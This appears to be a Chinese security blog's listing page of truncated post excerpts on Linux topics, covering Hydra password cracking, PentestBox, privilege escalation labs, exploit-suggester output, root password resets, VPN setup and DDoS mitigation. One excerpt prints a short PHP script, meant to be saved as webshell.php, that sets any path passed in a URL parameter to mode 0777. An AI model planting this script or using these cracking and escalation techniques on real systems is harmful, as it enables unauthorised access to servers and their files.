Linux下暴力破解工具Hydra详解

分类:安全 | 2017-03-16 | 撸过 2,004 次
0人扯谈

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cy[......]

继续阅读

PentestBox简明使用教程

分类:安全 | 2017-02-4 | 撸过 2,145 次
0人扯谈

0x01介绍

PentestBox:渗透测试盒子 顾名思义,这是一个渗透工具包,但是不同于绝大多数国内xx工具包的是,这里集成的大都是Linux下的工具,Kali Linux上面的常用的很多工具这里面也都集成了。

PentestBox官网:https://pentestbox.org/zh/

官方的介绍如下:

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境

为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。

它打包了所有的安全工具,并且可以在Windows系统中原生地[......]

继续阅读

linux 提权 实战Linux下三种不同方式的提权技巧

分类:安全 | 2016-10-3 | 撸过 2,352 次
2人扯谈

介绍:

渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。

 

实验一:利用Linux内核漏洞提权

VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到
[......]

继续阅读

Linux_Exploit_Suggester — Linux下提权辅助工具

分类:安全 | 2016-09-24 | 撸过 1,194 次
0人扯谈

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。

例子:

$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0

Kernel local: 3.0.0

Possible Exploits:
[+] semtex
   CVE-2013-2094
   Source: www.exploit-db.com/download/25444/‎
[+] memodipper[......]

继续阅读

Linux系统各版本的本地root密码破解方法

分类:安全 | 2012-03-3 | 撸过 408 次
0人扯谈

这段时间老碰到有人问及各个linux版本的本地root密码破解方法,我这里自己以及在网络上搜集了些资料,希望对看到了这文章而又恰好用得到的技术人员有点帮助:

(一)RedHat/CentOS/Fedora 系统密码破解

  1.在grub选项菜单按E进入编辑模式

  2.编辑kernel 那行最后加上S (或者Single)

  3.按B,启动到single-user mode

  4.进入后执行下列命令

  # mount -t proc proc /proc

  # mount -o remount,rw /

  #passwd

  #sync

  #reboot

([......]

继续阅读

Unix目录结构的来历

分类:新闻 | 2012-02-17 | 撸过 295 次
1人扯谈

Unix(包含Linux)的初学者,常常会很困惑,不明白目录结构的含义何在。

举例来说,根目录下面有一个子目录/bin,用于存放二进制程序。但是,/usr子目录下面还有/usr/bin,以及/usr/local/bin,也用于存放二进制程序;某些系统甚至还有/opt/bin。它们有何区别?

长久以来,我也感到很费解,不明白为什么这样设计。像大多数人一样,我只是根据《Unix文件系统结构标准》(Filesystem Hierarchy Standard),死记硬背不同目录的区别。

昨天,我读到了Rob Landley的简短解释,这才恍然大悟,原来Unix目录结构是历史造成的[......]

继续阅读

使用Linux搭建VPN服务器

分类:技术 | 2011-12-30 | 撸过 483 次
0人扯谈

VPN服务器的配置与应用

实验场景 通过将Linux配置VPN服务器允许远程计算机能够访问内网

安装前准备:
1、检查服务器是否有必要的支持。如果检查结果没有这些支持的话,是不能安装pptp的。命令:

modprobe ppp-compress-18 && echo ok

这条执行执行后,显示“ok”则表明通过。不过接下来还需要做另一个检查,输入指令:

2。cat /dev/net/tun

  如果显示如下信息,说明通过,如果不支持,可以给vps商发ticket开通tun,大部分美国vps商都可以支持:

  cat: /dev/net/tun: File desc[......]

继续阅读

linux远程登陆的安全设置

分类:安全 | 2011-12-21 | 撸过 351 次
0人扯谈

#编辑/etc/hosts.deny,添加以下内容

#第一个all表示对所有服务有效,第二个all表示对所有ip有效,除了222.222.222.222和222.222.222.223,ip之间用空格分开

ALL: ALL EXCEPT 222.222.222.222 222.222.222.223

可以查看man hosts.deny

www.webshell.cc

/var/log/auth

linux不提权跨目录访问的代码

分类:安全 | 2011-12-6 | 撸过 475 次
0人扯谈

linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。

在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。

代码如下:

<?php
$path = stripslashes($_GET ['path'] );
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>

把上面代码保存为webshell.PHP

然后访问http://www.webshell.c[......]

继续阅读

Linux下防御/减轻DDOS攻击

分类:安全 | 2011-11-12 | 撸过 367 次
0人扯谈

互联网如同现实社会一样充满钩心斗角,网站被DDOS也成为站长最头疼的事。在没有硬防的情况下,寻找软件代替是最直接的方法,比如用iptables,但是iptables不能在自动屏蔽,只能手动屏蔽。今天要说的就是一款能够自动屏蔽DDOS攻击者IP的软件:DDoS deflate。

 

DDoS deflate介绍

DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过netstat监测跟踪创建大量网络连接的IP地址,在检测到某个结点超过预设的限 制时,该程序会通过APF或IPTABLES禁止或阻挡这些IP.

DDoS deflate官方网站:http://d[......]

继续阅读

第 1 页,共 2 页12